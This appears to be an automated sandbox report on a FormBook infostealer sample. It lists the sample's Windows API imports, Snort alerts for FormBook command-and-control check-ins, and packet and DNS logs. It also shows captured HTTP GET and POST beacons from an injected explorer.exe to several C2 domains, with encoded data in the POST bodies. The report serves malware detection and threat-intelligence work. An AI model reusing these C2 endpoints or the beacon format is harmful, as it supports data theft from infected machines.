                                                            KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                            Possible Origin

                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishUnited States

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            192.168.2.481.169.145.8849695802031412 03/20/23-11:27:41.124513TCP2031412ET TROJAN FormBook CnC Checkin (GET)4969580192.168.2.481.169.145.88
                                                            192.168.2.4104.233.254.11349709802031449 03/20/23-11:28:53.219959TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970980192.168.2.4104.233.254.113
                                                            192.168.2.4113.52.135.19349703802031453 03/20/23-11:28:29.350188TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970380192.168.2.4113.52.135.193
                                                            192.168.2.4113.52.135.19349703802031412 03/20/23-11:28:29.350188TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970380192.168.2.4113.52.135.193
                                                            192.168.2.481.169.145.8849695802031453 03/20/23-11:27:41.124513TCP2031453ET TROJAN FormBook CnC Checkin (GET)4969580192.168.2.481.169.145.88
                                                            192.168.2.4199.192.28.11049699802031453 03/20/23-11:28:13.420032TCP2031453ET TROJAN FormBook CnC Checkin (GET)4969980192.168.2.4199.192.28.110
                                                            192.168.2.48.8.8.860686532023883 03/20/23-11:29:11.441798UDP2023883ET DNS Query to a *.top domain - Likely Hostile6068653192.168.2.48.8.8.8
                                                            192.168.2.481.169.145.8849695802031449 03/20/23-11:27:41.124513TCP2031449ET TROJAN FormBook CnC Checkin (GET)4969580192.168.2.481.169.145.88
                                                            192.168.2.446.23.69.4449705802031412 03/20/23-11:28:37.254660TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970580192.168.2.446.23.69.44
                                                            192.168.2.4199.192.28.11049699802031412 03/20/23-11:28:13.420032TCP2031412ET TROJAN FormBook CnC Checkin (GET)4969980192.168.2.4199.192.28.110
                                                            192.168.2.4113.52.135.19349703802031449 03/20/23-11:28:29.350188TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970380192.168.2.4113.52.135.193
                                                            192.168.2.446.23.69.4449705802031453 03/20/23-11:28:37.254660TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970580192.168.2.446.23.69.44
                                                            192.168.2.4104.233.254.11349709802031453 03/20/23-11:28:53.219959TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970980192.168.2.4104.233.254.113
                                                            192.168.2.446.23.69.4449705802031449 03/20/23-11:28:37.254660TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970580192.168.2.446.23.69.44
                                                            192.168.2.4199.192.28.11049699802031449 03/20/23-11:28:13.420032TCP2031449ET TROJAN FormBook CnC Checkin (GET)4969980192.168.2.4199.192.28.110
                                                            192.168.2.4104.233.254.11349709802031412 03/20/23-11:28:53.219959TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970980192.168.2.4104.233.254.113

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Mar 20, 2023 11:27:41.103671074 CET4969580192.168.2.481.169.145.88
                                                            Mar 20, 2023 11:27:41.124280930 CET804969581.169.145.88192.168.2.4
                                                            Mar 20, 2023 11:27:41.124399900 CET4969580192.168.2.481.169.145.88
                                                            Mar 20, 2023 11:27:41.124512911 CET4969580192.168.2.481.169.145.88
                                                            Mar 20, 2023 11:27:41.144968033 CET804969581.169.145.88192.168.2.4
                                                            Mar 20, 2023 11:27:41.146936893 CET804969581.169.145.88192.168.2.4
                                                            Mar 20, 2023 11:27:41.147181034 CET804969581.169.145.88192.168.2.4
                                                            Mar 20, 2023 11:27:41.148864031 CET4969580192.168.2.481.169.145.88
                                                            Mar 20, 2023 11:27:41.154973984 CET4969580192.168.2.481.169.145.88
                                                            Mar 20, 2023 11:27:41.174519062 CET804969581.169.145.88192.168.2.4
                                                            Mar 20, 2023 11:27:51.205352068 CET4969680192.168.2.450.87.195.203
                                                            Mar 20, 2023 11:27:51.390180111 CET804969650.87.195.203192.168.2.4
                                                            Mar 20, 2023 11:27:51.390422106 CET4969680192.168.2.450.87.195.203
                                                            Mar 20, 2023 11:27:51.390614033 CET4969680192.168.2.450.87.195.203
                                                            Mar 20, 2023 11:27:51.575270891 CET804969650.87.195.203192.168.2.4
                                                            Mar 20, 2023 11:27:51.819456100 CET804969650.87.195.203192.168.2.4
                                                            Mar 20, 2023 11:27:51.819508076 CET804969650.87.195.203192.168.2.4
                                                            Mar 20, 2023 11:27:51.819648027 CET4969680192.168.2.450.87.195.203
                                                            Mar 20, 2023 11:27:52.892504930 CET4969680192.168.2.450.87.195.203
                                                            Mar 20, 2023 11:27:53.909151077 CET4969780192.168.2.450.87.195.203
                                                            Mar 20, 2023 11:27:54.093878984 CET804969750.87.195.203192.168.2.4
                                                            Mar 20, 2023 11:27:54.098609924 CET4969780192.168.2.450.87.195.203
                                                            Mar 20, 2023 11:27:54.098740101 CET4969780192.168.2.450.87.195.203
                                                            Mar 20, 2023 11:27:54.283379078 CET804969750.87.195.203192.168.2.4
                                                            Mar 20, 2023 11:27:54.881174088 CET804969750.87.195.203192.168.2.4
                                                            Mar 20, 2023 11:27:54.923999071 CET4969780192.168.2.450.87.195.203
                                                            Mar 20, 2023 11:28:04.891547918 CET804969750.87.195.203192.168.2.4
                                                            Mar 20, 2023 11:28:04.891773939 CET4969780192.168.2.450.87.195.203
                                                            Mar 20, 2023 11:28:04.906358957 CET4969780192.168.2.450.87.195.203
                                                            Mar 20, 2023 11:28:05.090928078 CET804969750.87.195.203192.168.2.4
                                                            Mar 20, 2023 11:28:09.970515013 CET4969880192.168.2.4199.192.28.110
                                                            Mar 20, 2023 11:28:10.138561010 CET8049698199.192.28.110192.168.2.4
                                                            Mar 20, 2023 11:28:10.139292955 CET4969880192.168.2.4199.192.28.110
                                                            Mar 20, 2023 11:28:10.139673948 CET4969880192.168.2.4199.192.28.110
                                                            Mar 20, 2023 11:28:10.307205915 CET8049698199.192.28.110192.168.2.4
                                                            Mar 20, 2023 11:28:10.410506964 CET8049698199.192.28.110192.168.2.4
                                                            Mar 20, 2023 11:28:10.410605907 CET8049698199.192.28.110192.168.2.4
                                                            Mar 20, 2023 11:28:10.410754919 CET4969880192.168.2.4199.192.28.110
                                                            Mar 20, 2023 11:28:11.960941076 CET4969880192.168.2.4199.192.28.110
                                                            Mar 20, 2023 11:28:13.250793934 CET4969980192.168.2.4199.192.28.110
                                                            Mar 20, 2023 11:28:13.418484926 CET8049699199.192.28.110192.168.2.4
                                                            Mar 20, 2023 11:28:13.419913054 CET4969980192.168.2.4199.192.28.110
                                                            Mar 20, 2023 11:28:13.420032024 CET4969980192.168.2.4199.192.28.110
                                                            Mar 20, 2023 11:28:13.587511063 CET8049699199.192.28.110192.168.2.4
                                                            Mar 20, 2023 11:28:13.697813988 CET8049699199.192.28.110192.168.2.4
                                                            Mar 20, 2023 11:28:13.697864056 CET8049699199.192.28.110192.168.2.4
                                                            Mar 20, 2023 11:28:13.698159933 CET4969980192.168.2.4199.192.28.110
                                                            Mar 20, 2023 11:28:13.698652983 CET4969980192.168.2.4199.192.28.110
                                                            Mar 20, 2023 11:28:13.866168022 CET8049699199.192.28.110192.168.2.4
                                                            Mar 20, 2023 11:28:18.763628960 CET4970080192.168.2.4217.160.0.32
                                                            Mar 20, 2023 11:28:18.786365986 CET8049700217.160.0.32192.168.2.4
                                                            Mar 20, 2023 11:28:18.788248062 CET4970080192.168.2.4217.160.0.32
                                                            Mar 20, 2023 11:28:18.788455009 CET4970080192.168.2.4217.160.0.32
                                                            Mar 20, 2023 11:28:18.811074972 CET8049700217.160.0.32192.168.2.4
                                                            Mar 20, 2023 11:28:18.816607952 CET8049700217.160.0.32192.168.2.4
                                                            Mar 20, 2023 11:28:18.816633940 CET8049700217.160.0.32192.168.2.4
                                                            Mar 20, 2023 11:28:18.816771984 CET4970080192.168.2.4217.160.0.32
                                                            Mar 20, 2023 11:28:20.301188946 CET4970080192.168.2.4217.160.0.32
                                                            Mar 20, 2023 11:28:21.318445921 CET4970180192.168.2.4217.160.0.32
                                                            Mar 20, 2023 11:28:21.341140985 CET8049701217.160.0.32192.168.2.4
                                                            Mar 20, 2023 11:28:21.341253996 CET4970180192.168.2.4217.160.0.32
                                                            Mar 20, 2023 11:28:21.341408014 CET4970180192.168.2.4217.160.0.32
                                                            Mar 20, 2023 11:28:21.367325068 CET8049701217.160.0.32192.168.2.4
                                                            Mar 20, 2023 11:28:21.374430895 CET8049701217.160.0.32192.168.2.4
                                                            Mar 20, 2023 11:28:21.374499083 CET8049701217.160.0.32192.168.2.4
                                                            Mar 20, 2023 11:28:21.374721050 CET4970180192.168.2.4217.160.0.32
                                                            Mar 20, 2023 11:28:21.375020027 CET4970180192.168.2.4217.160.0.32
                                                            Mar 20, 2023 11:28:21.397676945 CET8049701217.160.0.32192.168.2.4
                                                            Mar 20, 2023 11:28:26.419450998 CET4970280192.168.2.4113.52.135.193
                                                            Mar 20, 2023 11:28:26.623085022 CET8049702113.52.135.193192.168.2.4
                                                            Mar 20, 2023 11:28:26.623271942 CET4970280192.168.2.4113.52.135.193
                                                            Mar 20, 2023 11:28:26.623491049 CET4970280192.168.2.4113.52.135.193
                                                            Mar 20, 2023 11:28:26.827152014 CET8049702113.52.135.193192.168.2.4
                                                            Mar 20, 2023 11:28:26.827330112 CET8049702113.52.135.193192.168.2.4
                                                            Mar 20, 2023 11:28:26.827353001 CET8049702113.52.135.193192.168.2.4
                                                            Mar 20, 2023 11:28:26.827411890 CET4970280192.168.2.4113.52.135.193
                                                            Mar 20, 2023 11:28:28.130045891 CET4970280192.168.2.4113.52.135.193
                                                            Mar 20, 2023 11:28:29.146186113 CET4970380192.168.2.4113.52.135.193
                                                            Mar 20, 2023 11:28:29.349519014 CET8049703113.52.135.193192.168.2.4
                                                            Mar 20, 2023 11:28:29.349842072 CET4970380192.168.2.4113.52.135.193
                                                            Mar 20, 2023 11:28:29.350188017 CET4970380192.168.2.4113.52.135.193
                                                            Mar 20, 2023 11:28:29.553194046 CET8049703113.52.135.193192.168.2.4
                                                            Mar 20, 2023 11:28:29.553384066 CET8049703113.52.135.193192.168.2.4
                                                            Mar 20, 2023 11:28:29.553415060 CET8049703113.52.135.193192.168.2.4
                                                            Mar 20, 2023 11:28:29.553632975 CET4970380192.168.2.4113.52.135.193
                                                            Mar 20, 2023 11:28:29.553765059 CET4970380192.168.2.4113.52.135.193
                                                            Mar 20, 2023 11:28:29.756839037 CET8049703113.52.135.193192.168.2.4
                                                            Mar 20, 2023 11:28:34.640928030 CET4970480192.168.2.446.23.69.44
                                                            Mar 20, 2023 11:28:34.668648958 CET804970446.23.69.44192.168.2.4
                                                            Mar 20, 2023 11:28:34.668832064 CET4970480192.168.2.446.23.69.44
                                                            Mar 20, 2023 11:28:34.700421095 CET4970480192.168.2.446.23.69.44
                                                            Mar 20, 2023 11:28:34.728221893 CET804970446.23.69.44192.168.2.4
                                                            Mar 20, 2023 11:28:34.733566046 CET804970446.23.69.44192.168.2.4
                                                            Mar 20, 2023 11:28:34.733638048 CET804970446.23.69.44192.168.2.4
                                                            Mar 20, 2023 11:28:34.733741999 CET4970480192.168.2.446.23.69.44
                                                            Mar 20, 2023 11:28:36.209743023 CET4970480192.168.2.446.23.69.44
                                                            Mar 20, 2023 11:28:37.225220919 CET4970580192.168.2.446.23.69.44
                                                            Mar 20, 2023 11:28:37.253339052 CET804970546.23.69.44192.168.2.4
                                                            Mar 20, 2023 11:28:37.253623009 CET4970580192.168.2.446.23.69.44
                                                            Mar 20, 2023 11:28:37.254659891 CET4970580192.168.2.446.23.69.44
                                                            Mar 20, 2023 11:28:37.283118963 CET804970546.23.69.44192.168.2.4
                                                            Mar 20, 2023 11:28:37.346201897 CET804970546.23.69.44192.168.2.4
                                                            Mar 20, 2023 11:28:37.346245050 CET804970546.23.69.44192.168.2.4
                                                            Mar 20, 2023 11:28:37.346700907 CET4970580192.168.2.446.23.69.44
                                                            Mar 20, 2023 11:28:37.347042084 CET4970580192.168.2.446.23.69.44
                                                            Mar 20, 2023 11:28:37.374474049 CET804970546.23.69.44192.168.2.4
                                                            Mar 20, 2023 11:28:42.405802011 CET4970680192.168.2.437.97.254.29
                                                            Mar 20, 2023 11:28:42.431706905 CET804970637.97.254.29192.168.2.4
                                                            Mar 20, 2023 11:28:42.431899071 CET4970680192.168.2.437.97.254.29
                                                            Mar 20, 2023 11:28:42.432090998 CET4970680192.168.2.437.97.254.29
                                                            Mar 20, 2023 11:28:42.458051920 CET804970637.97.254.29192.168.2.4
                                                            Mar 20, 2023 11:28:42.458190918 CET4970680192.168.2.437.97.254.29
                                                            Mar 20, 2023 11:28:43.943768024 CET4970680192.168.2.437.97.254.29
                                                            Mar 20, 2023 11:28:44.960814953 CET4970780192.168.2.437.97.254.29
                                                            Mar 20, 2023 11:28:44.986885071 CET804970737.97.254.29192.168.2.4
                                                            Mar 20, 2023 11:28:44.987083912 CET4970780192.168.2.437.97.254.29
                                                            Mar 20, 2023 11:28:44.987210035 CET4970780192.168.2.437.97.254.29
                                                            Mar 20, 2023 11:28:45.015016079 CET804970737.97.254.29192.168.2.4
                                                            Mar 20, 2023 11:28:45.015253067 CET4970780192.168.2.437.97.254.29
                                                            Mar 20, 2023 11:28:45.028073072 CET4970780192.168.2.437.97.254.29
                                                            Mar 20, 2023 11:28:45.053888083 CET804970737.97.254.29192.168.2.4
                                                            Mar 20, 2023 11:28:50.080377102 CET4970880192.168.2.4104.233.254.113
                                                            Mar 20, 2023 11:28:50.366540909 CET8049708104.233.254.113192.168.2.4
                                                            Mar 20, 2023 11:28:50.366864920 CET4970880192.168.2.4104.233.254.113
                                                            Mar 20, 2023 11:28:50.367239952 CET4970880192.168.2.4104.233.254.113
                                                            Mar 20, 2023 11:28:50.652158022 CET8049708104.233.254.113192.168.2.4
                                                            Mar 20, 2023 11:28:50.653989077 CET8049708104.233.254.113192.168.2.4
                                                            Mar 20, 2023 11:28:50.654407024 CET8049708104.233.254.113192.168.2.4
                                                            Mar 20, 2023 11:28:50.654536963 CET4970880192.168.2.4104.233.254.113
                                                            Mar 20, 2023 11:28:50.654957056 CET8049708104.233.254.113192.168.2.4
                                                            Mar 20, 2023 11:28:50.655349970 CET8049708104.233.254.113192.168.2.4
                                                            Mar 20, 2023 11:28:50.655549049 CET4970880192.168.2.4104.233.254.113
                                                            Mar 20, 2023 11:28:51.913813114 CET4970880192.168.2.4104.233.254.113
                                                            Mar 20, 2023 11:28:52.929598093 CET4970980192.168.2.4104.233.254.113
                                                            Mar 20, 2023 11:28:53.219618082 CET8049709104.233.254.113192.168.2.4
                                                            Mar 20, 2023 11:28:53.219793081 CET4970980192.168.2.4104.233.254.113
                                                            Mar 20, 2023 11:28:53.219959021 CET4970980192.168.2.4104.233.254.113
                                                            Mar 20, 2023 11:28:53.510878086 CET8049709104.233.254.113192.168.2.4
                                                            Mar 20, 2023 11:28:53.511255026 CET8049709104.233.254.113192.168.2.4
                                                            Mar 20, 2023 11:28:53.511358976 CET4970980192.168.2.4104.233.254.113
                                                            Mar 20, 2023 11:28:53.511724949 CET8049709104.233.254.113192.168.2.4
                                                            Mar 20, 2023 11:28:53.512185097 CET8049709104.233.254.113192.168.2.4
                                                            Mar 20, 2023 11:28:53.512355089 CET4970980192.168.2.4104.233.254.113
                                                            Mar 20, 2023 11:28:53.646645069 CET4970980192.168.2.4104.233.254.113
                                                            Mar 20, 2023 11:28:53.934423923 CET8049709104.233.254.113192.168.2.4

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Mar 20, 2023 11:27:41.073858976 CET5657253192.168.2.48.8.8.8
                                                            Mar 20, 2023 11:27:41.092590094 CET53565728.8.8.8192.168.2.4
                                                            Mar 20, 2023 11:27:51.185725927 CET5091153192.168.2.48.8.8.8
                                                            Mar 20, 2023 11:27:51.203722954 CET53509118.8.8.8192.168.2.4
                                                            Mar 20, 2023 11:28:09.934638023 CET5968353192.168.2.48.8.8.8
                                                            Mar 20, 2023 11:28:09.969444990 CET53596838.8.8.8192.168.2.4
                                                            Mar 20, 2023 11:28:18.710139036 CET6416753192.168.2.48.8.8.8
                                                            Mar 20, 2023 11:28:18.761651993 CET53641678.8.8.8192.168.2.4
                                                            Mar 20, 2023 11:28:26.393294096 CET5856553192.168.2.48.8.8.8
                                                            Mar 20, 2023 11:28:26.418127060 CET53585658.8.8.8192.168.2.4
                                                            Mar 20, 2023 11:28:34.576559067 CET5223953192.168.2.48.8.8.8
                                                            Mar 20, 2023 11:28:34.612303972 CET53522398.8.8.8192.168.2.4
                                                            Mar 20, 2023 11:28:42.362283945 CET5680753192.168.2.48.8.8.8
                                                            Mar 20, 2023 11:28:42.404155016 CET53568078.8.8.8192.168.2.4
                                                            Mar 20, 2023 11:28:50.041943073 CET6100753192.168.2.48.8.8.8
                                                            Mar 20, 2023 11:28:50.077486038 CET53610078.8.8.8192.168.2.4
                                                            Mar 20, 2023 11:29:11.441797972 CET6068653192.168.2.48.8.8.8
                                                            Mar 20, 2023 11:29:12.049052954 CET53606868.8.8.8192.168.2.4

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Mar 20, 2023 11:27:41.073858976 CET192.168.2.48.8.8.80x8ccbStandard query (0)www.versicherungsgott.comA (IP address)IN (0x0001)false
                                                            Mar 20, 2023 11:27:51.185725927 CET192.168.2.48.8.8.80x8afStandard query (0)www.motherhoodinthegarden.comA (IP address)IN (0x0001)false
                                                            Mar 20, 2023 11:28:09.934638023 CET192.168.2.48.8.8.80x77a1Standard query (0)www.getpay.lifeA (IP address)IN (0x0001)false
                                                            Mar 20, 2023 11:28:18.710139036 CET192.168.2.48.8.8.80x8ebcStandard query (0)www.espisys-technology.comA (IP address)IN (0x0001)false
                                                            Mar 20, 2023 11:28:26.393294096 CET192.168.2.48.8.8.80x6924Standard query (0)www.on-smooth.comA (IP address)IN (0x0001)false
                                                            Mar 20, 2023 11:28:34.576559067 CET192.168.2.48.8.8.80x759eStandard query (0)www.luxgudonu.storeA (IP address)IN (0x0001)false
                                                            Mar 20, 2023 11:28:42.362283945 CET192.168.2.48.8.8.80x5976Standard query (0)www.sowmedia.siteA (IP address)IN (0x0001)false
                                                            Mar 20, 2023 11:28:50.041943073 CET192.168.2.48.8.8.80x9a04Standard query (0)www.yh78898.comA (IP address)IN (0x0001)false
                                                            Mar 20, 2023 11:29:11.441797972 CET192.168.2.48.8.8.80x8dddStandard query (0)www.363ww.topA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Mar 20, 2023 11:27:41.092590094 CET8.8.8.8192.168.2.40x8ccbNo error (0)www.versicherungsgott.comversicherungsgott.comCNAME (Canonical name)IN (0x0001)false
                                                            Mar 20, 2023 11:27:41.092590094 CET8.8.8.8192.168.2.40x8ccbNo error (0)versicherungsgott.com81.169.145.88A (IP address)IN (0x0001)false
                                                            Mar 20, 2023 11:27:51.203722954 CET8.8.8.8192.168.2.40x8afNo error (0)www.motherhoodinthegarden.commotherhoodinthegarden.comCNAME (Canonical name)IN (0x0001)false
                                                            Mar 20, 2023 11:27:51.203722954 CET8.8.8.8192.168.2.40x8afNo error (0)motherhoodinthegarden.com50.87.195.203A (IP address)IN (0x0001)false
                                                            Mar 20, 2023 11:28:09.969444990 CET8.8.8.8192.168.2.40x77a1No error (0)www.getpay.life199.192.28.110A (IP address)IN (0x0001)false
                                                            Mar 20, 2023 11:28:18.761651993 CET8.8.8.8192.168.2.40x8ebcNo error (0)www.espisys-technology.com217.160.0.32A (IP address)IN (0x0001)false
                                                            Mar 20, 2023 11:28:26.418127060 CET8.8.8.8192.168.2.40x6924No error (0)www.on-smooth.comon-smooth.comCNAME (Canonical name)IN (0x0001)false
                                                            Mar 20, 2023 11:28:26.418127060 CET8.8.8.8192.168.2.40x6924No error (0)on-smooth.com113.52.135.193A (IP address)IN (0x0001)false
                                                            Mar 20, 2023 11:28:34.612303972 CET8.8.8.8192.168.2.40x759eNo error (0)www.luxgudonu.storeluxgudonu.storeCNAME (Canonical name)IN (0x0001)false
                                                            Mar 20, 2023 11:28:34.612303972 CET8.8.8.8192.168.2.40x759eNo error (0)luxgudonu.store46.23.69.44A (IP address)IN (0x0001)false
                                                            Mar 20, 2023 11:28:42.404155016 CET8.8.8.8192.168.2.40x5976No error (0)www.sowmedia.sitesowmedia.siteCNAME (Canonical name)IN (0x0001)false
                                                            Mar 20, 2023 11:28:42.404155016 CET8.8.8.8192.168.2.40x5976No error (0)sowmedia.site37.97.254.29A (IP address)IN (0x0001)false
                                                            Mar 20, 2023 11:28:50.077486038 CET8.8.8.8192.168.2.40x9a04No error (0)www.yh78898.com104.233.254.113A (IP address)IN (0x0001)false
                                                            Mar 20, 2023 11:29:12.049052954 CET8.8.8.8192.168.2.40x8dddNo error (0)www.363ww.top39.109.117.109A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • www.versicherungsgott.com
                                                            • www.motherhoodinthegarden.com
                                                            • www.getpay.life
                                                            • www.espisys-technology.com
                                                            • www.on-smooth.com
                                                            • www.luxgudonu.store
                                                            • www.sowmedia.site
                                                            • www.yh78898.com

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            0192.168.2.44969581.169.145.8880C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Mar 20, 2023 11:27:41.124512911 CET97OUTGET /d2a3/?F7L99l=8qpwJ&Mw=3fW4twhu5IX2LSkBcFVlWjxiVco4zHJfqjvATlwHU7q8puaymE5DWsW8adrpP96Z6UNtMOOwQnTRLGoNrAuApIzT11t8CH71vQ== HTTP/1.1
                                                            Host: www.versicherungsgott.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Mar 20, 2023 11:27:41.146936893 CET98INHTTP/1.1 404 Not Found
                                                            Date: Mon, 20 Mar 2023 10:27:41 GMT
                                                            Server: Apache/2.4.56 (Unix)
                                                            Content-Length: 196
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1192.168.2.44969650.87.195.20380C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Mar 20, 2023 11:27:51.390614033 CET99OUTPOST /d2a3/ HTTP/1.1
                                                            Host: www.motherhoodinthegarden.com
                                                            Connection: close
                                                            Content-Length: 184
                                                            Cache-Control: no-cache
                                                            Origin: http://www.motherhoodinthegarden.com
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://www.motherhoodinthegarden.com/d2a3/
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate
                                                            Data Raw: 4d 77 3d 52 50 52 67 48 34 38 6e 43 63 44 72 51 57 37 78 32 56 34 7a 42 72 67 44 64 38 49 50 6e 38 76 6f 64 73 6f 58 51 78 4b 31 59 4b 66 4d 35 7a 6e 72 59 4d 78 73 76 48 33 4d 57 79 7a 71 4f 73 38 68 53 6c 50 6b 43 37 73 48 61 6c 33 64 52 4a 61 49 55 74 48 45 77 42 30 64 45 57 55 47 65 6f 4a 4e 45 31 6e 4e 54 76 37 4c 76 51 4d 56 4e 5f 61 4c 49 47 62 36 39 54 61 42 67 30 39 53 57 70 77 6a 63 39 73 53 78 69 4e 63 75 5a 67 70 66 58 6f 4e 74 75 34 38 6b 37 52 6f 46 4b 7a 32 6d 63 36 72 59 4f 68 6c 31 76 75 6c 69 48 75 4b 41 73 35 69 34 67 29 2e 00 00 00 00 00 00 00 00
                                                            Data Ascii: Mw=RPRgH48nCcDrQW7x2V4zBrgDd8IPn8vodsoXQxK1YKfM5znrYMxsvH3MWyzqOs8hSlPkC7sHal3dRJaIUtHEwB0dEWUGeoJNE1nNTv7LvQMVN_aLIGb69TaBg09SWpwjc9sSxiNcuZgpfXoNtu48k7RoFKz2mc6rYOhl1vuliHuKAs5i4g).
                                                            Mar 20, 2023 11:27:51.819456100 CET101INHTTP/1.1 404 Not Found
                                                            Date: Mon, 20 Mar 2023 10:27:51 GMT
                                                            Server: Apache
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip
                                                            host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                            X-Endurance-Cache-Level: 2
                                                            X-nginx-cache: WordPress
                                                            Content-Length: 1037
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 8f e3 34 14 7d 9e fe 0a 6f 10 fb 80 48 d2 96 59 1e 3a 69 57 c3 80 10 12 1f 2b 0d 08 f1 b4 72 e2 db da 33 8e af b1 9d a6 5d b4 ff 9d eb 38 e9 b4 bb b3 80 44 55 a9 ee fd 38 f7 dc 73 6e f5 e2 db 5f ee 7e fd e3 cd 77 4c 86 56 6f 66 55 fc 61 9a 9b dd 3a 03 93 ff 76 9f 6d 66 57 95 04 2e e8 f7 aa 6a 21 70 66 78 0b eb 6c af a0 b7 e8 42 c6 1a 34 01 4c 58 67 bd 12 41 ae 05 ec 55 03 f9 f0 27 fb b0 cb 61 8d c1 9f f5 18 54 46 c0 e1 4b 66 70 8b 5a 63 9f b1 72 68 0a 2a 68 d8 fc 84 41 82 93 88 82 29 c3 e8 cd be e7 4e 80 61 2f 5b c1 bd bc 61 77 d8 2a b3 63 f7 88 a6 2a 53 4f ec f6 8d 53 36 30 ef 9a 75 26 43 b0 ab b2 6c 4f 50 ca d0 6b 37 e0 14 0d b6 65 6f 73 65 1a dd 09 f0 e5 03 7d ff ec c0 1d c7 9f e2 c1 67 9b aa 4c 78 09 3a 1c 35 b0 70 b4 b4 4e 80 43 28 1b 4f 25 5f b0 bf 66 8c 3e 35 1e 72 af de 11 a7 15 bd 69 84 cb 29 74 33 e4 f2 16 df e5 ff 58 d0 43 fd a8 c2 27 6b de cf 66 35 8a e3 34 8a 37 8f 3b 87 9d 11 79 83 1a dd 8a f5 52 05 48 50 63 a4 d6 54 94 22 b8 07 b7 25 81 f3 c3 8a 49 25 68 f9 14 6f b9 db 29 b3 62 f3 01 ff b3 de 71 3b 0e e0 5a ed 4c 4e 90 ad 5f b1 86 ec 02 97 5a 84 f2 56 f3 e3 8a 6d 35 8c d4 1f 3a 1f d4 f6 98 8f c6 5e d6 93 45 b9 04 b5 93 14 5f cc e7 7b 39 8c 2a c6 da 71 5a c4 a2 f4 25 29 de 05 64 af 3e 4f 41 cb 85 18 34 99 a7 ff 51 fd 7c 20 f9 c1 38 7e 48 e7 b7 62 d7 cb b9 4d c2 6d 11 a9 60 9c 35 66 89 cb 04 8d 5e 05 85 04 b4 55 07 10 37 a3 97 21 60 7b 1a a7 61 1b 26 99 46 b4 49 a9 e7 98 c4 0d eb 60 3e 32 eb c2 94 33 0f 55 cb 77 b0 62 06 0d 4c e3 a3 f3 c4 d2 1e 98 47 ad c4 45 63 3c 11 c9 05 f6 e7 2d cf dc 41 e7 7c 0c 59 54 cf f8 a7 